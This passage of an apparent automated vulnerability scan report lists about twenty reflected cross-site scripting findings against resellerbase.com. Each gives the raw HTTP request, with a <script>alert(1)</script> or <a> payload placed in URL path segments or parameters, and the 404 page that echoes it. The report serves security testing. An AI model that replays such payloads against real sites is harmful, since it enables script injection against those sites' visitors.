Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=25bc9d<a>c92b91ad994 was not found on this server.</p>
...[SNIP]...

2.909. http://www.resellerbase.com/detail/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca492<script>alert(1)</script>8f9fad94708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailca492<script>alert(1)</script>8f9fad94708/11/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailca492<script>alert(1)</script>8f9fad94708/11/ was not found on this server.</p>
...[SNIP]...

2.910. http://www.resellerbase.com/detail/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91bee<script>alert(1)</script>127e165ca9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1191bee<script>alert(1)</script>127e165ca9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1191bee<script>alert(1)</script>127e165ca9/ was not found on this server.</p>
...[SNIP]...

2.911. http://www.resellerbase.com/detail/11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd1d1<script>alert(1)</script>2c1fe0772ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/?cd1d1<script>alert(1)</script>2c1fe0772ad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/?cd1d1<script>alert(1)</script>2c1fe0772ad=1 was not found on this server.</p>
...[SNIP]...

2.912. http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/how-to-win-with-online-reseller-products.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5094<script>alert(1)</script>c117f13e57f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb5094<script>alert(1)</script>c117f13e57f/11/how-to-win-with-online-reseller-products.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb5094<script>alert(1)</script>c117f13e57f/11/how-to-win-with-online-reseller-products.html was not found on this server.</p>
...[SNIP]...

2.913. http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/how-to-win-with-online-reseller-products.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f455<a>2c59c8e353e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/114f455<a>2c59c8e353e/how-to-win-with-online-reseller-products.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/114f455<a>2c59c8e353e/how-to-win-with-online-reseller-products.html was not found on this server.</p>
...[SNIP]...

2.914. http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/how-to-win-with-online-reseller-products.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4dd99<script>alert(1)</script>53dcb7a5d2c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/4dd99<script>alert(1)</script>53dcb7a5d2c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/4dd99<script>alert(1)</script>53dcb7a5d2c was not found on this server.</p>
...[SNIP]...

2.915. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b833d<script>alert(1)</script>df753b03561 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb833d<script>alert(1)</script>df753b03561/11/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb833d<script>alert(1)</script>df753b03561/11/rating.php was not found on this server.</p>
...[SNIP]...

2.916. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dda1a<script>alert(1)</script>17851873386b454c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /detaildda1a<script>alert(1)</script>17851873386b454c9/11/rating.php?id=11&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildda1a<script>alert(1)</script>17851873386b454c9/11/rating.php?id=11&rating=5 was not found on this server.</p>
...[SNIP]...

2.917. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5e0f<script>alert(1)</script>0071cdda0edf64409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /detail/11c5e0f<script>alert(1)</script>0071cdda0edf64409/rating.php?id=11&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11c5e0f<script>alert(1)</script>0071cdda0edf64409/rating.php?id=11&rating=5 was not found on this server.</p>
...[SNIP]...

2.918. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ef8e<script>alert(1)</script>d6ba1dc2204 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/114ef8e<script>alert(1)</script>d6ba1dc2204/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/114ef8e<script>alert(1)</script>d6ba1dc2204/rating.php was not found on this server.</p>
...[SNIP]...

2.919. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e4fa6<script>alert(1)</script>b843420c14d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/rating.phpe4fa6<script>alert(1)</script>b843420c14d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/rating.phpe4fa6<script>alert(1)</script>b843420c14d was not found on this server.</p>
...[SNIP]...

2.920. http://www.resellerbase.com/detail/11/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f9d2<script>alert(1)</script>0b55685ae79e330c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/11/rating.php8f9d2<script>alert(1)</script>0b55685ae79e330c5?id=11&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/rating.php8f9d2<script>alert(1)</script>0b55685ae79e330c5?id=11&rating=5 was not found on this server.</p>
...[SNIP]...

2.921. http://www.resellerbase.com/detail/11/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dda7e<script>alert(1)</script>c58f7c33f08e89c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/11/rating.php/dda7e<script>alert(1)</script>c58f7c33f08e89c01?id=11&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/rating.php/dda7e<script>alert(1)</script>c58f7c33f08e89c01?id=11&rating=5 was not found on this server.</p>
...[SNIP]...

2.922. http://www.resellerbase.com/detail/11/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7873f<script>alert(1)</script>05dddf727c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/rating.php?7873f<script>alert(1)</script>05dddf727c9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/rating.php?7873f<script>alert(1)</script>05dddf727c9=1 was not found on this server.</p>
...[SNIP]...

2.923. http://www.resellerbase.com/detail/11/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ba6c<script>alert(1)</script>3f679e40754 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7ba6c<script>alert(1)</script>3f679e40754/11/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7ba6c<script>alert(1)</script>3f679e40754/11/search.php was not found on this server.</p>
...[SNIP]...

2.924. http://www.resellerbase.com/detail/11/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60c35<script>alert(1)</script>c7f818d9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1160c35<script>alert(1)</script>c7f818d9f94/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1160c35<script>alert(1)</script>c7f818d9f94/search.php was not found on this server.</p>
...[SNIP]...

2.925. http://www.resellerbase.com/detail/11/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6aa3e<script>alert(1)</script>3ed92c53583 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/search.php6aa3e<script>alert(1)</script>3ed92c53583 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php6aa3e<script>alert(1)</script>3ed92c53583 was not found on this server.</p>
...[SNIP]...

2.926. http://www.resellerbase.com/detail/11/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7eca0<a>0e5d84e62e2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/search.php?keyword=search...&Submit3=Search7eca0<a>0e5d84e62e2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php?keyword=search...&Submit3=Search7eca0<a>0e5d84e62e2&opt=2 was not found on this server.</p>
...[SNIP]...

2.927. http://www.resellerbase.com/detail/11/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/11/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1b8f5<a>93edda25898 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/11/search.php?keyword=search...1b8f5<a>93edda25898&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/search.php?keyword=search...1b8f5<a>93edda25898&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

